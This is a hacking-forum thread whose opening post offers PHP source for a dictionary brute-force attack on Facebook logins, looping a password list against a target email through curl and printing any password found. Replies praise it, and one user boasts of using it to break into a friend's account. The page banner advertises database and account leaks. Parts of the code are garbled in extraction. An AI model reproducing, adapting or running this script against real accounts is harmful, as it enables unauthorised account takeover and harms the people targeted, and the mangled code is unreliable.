Create an account

Very important

  • To access the important data of the forums, you must be active in each forum and especially in the leaks and database leaks section, send data and after sending the data and activity, data and important content will be opened and visible for you.
  • You will only see chat messages from people who are at or below your level.
  • More than 500,000 database leaks and millions of account leaks are waiting for you, so access and view with more activity.
  • Many important data are inactive and inaccessible for you, so open them with activity. (This will be done automatically)


Thread Rating:
  • 469 Vote(s) - 3.51 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Fac3book Bruteforcing (source)

#1
Ok Guyz!
To make this script work, you will need a server with apache
& obviously where Brutef0rcing is concerned you will need a user/pass list
You can easily find one. or make one! a word tool u can find on many cracking forums

PHP Code:
set_time_limit(0);
$username ="[email protected]"// username to brute force
$dictionary ="dictionary.txt"// need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent "Opera/9.21 (Windows NT 5.1; U; tr)";
$data "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS$data);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEFILE'cookie.txt');
curl_setopt($chCURLOPT_COOKIEJAR'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(
eregi("Home</title>",$source)){return true;} else {return false;}

}

if(!
is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo 
"Attack Starting..<br>";
sleep(10);
echo 
"Attack Started, brute forcing..<br>";
foreach(
$lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(
kontrol($username,$line)){echo "<font face=tahoma  color=green>[+]</font><font face=tahoma>  username:$username , password:$line - P
assword found : 
$line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo 
"<font face=tahoma color=brown>[-]</font><font  face=tahoma> username:$username , password:$line - Password not found  :  
$line</font><br>";}
}
?>
it just need some professional hands for modification
Reply

#2
yeah ...
i like this you script
Reply

#3
Be shak Wo Log jo MUSALMANO main be-Hayai phelana chahtay hain un k liye dunya aor Akhirat mai dardNak Aazab hay (Surah Noor # 24, Ayat # 19, Para # 18)
Reply

#4
All do respect but i thought facebook patched the bruteforcing i tried many and what makes this script special
Reply

#5
Quote:(03-31-2012, 05:09 PM)indonesia21 Wrote:

[To see links please register here]

yeah ...
i like this you script :biggrin:
The Pleasure is all mine!

Quote:(04-01-2012, 11:10 PM)Arrival Wrote:

[To see links please register here]

Be shak Wo Log jo MUSALMANO main be-Hayai phelana chahtay hain un k liye dunya aor Akhirat mai dardNak Aazab hay (Surah Noor # 24, Ayat # 19, Para # 18)
yaar ye php script kay liye tha ya meray signature kay liye??
Reply

#6
Thanks for the share I got my friends account and he was like WTF How? I was all like trade secret
Reply

#7
wow i like it ♥ ♥
Reply

#8
Quote:(10-18-2013, 01:13 PM)Hemin Michael Wrote:

[To see links please register here]

wow i like it ♥ ♥

Don't dig up old posts especially just to say "thanks" or "I like it"
/closed
Reply



Forum Jump:


Users browsing this thread:
1 Guest(s)

©0Day  2016 - 2023 | All Rights Reserved.  Made with    for the community. Connected through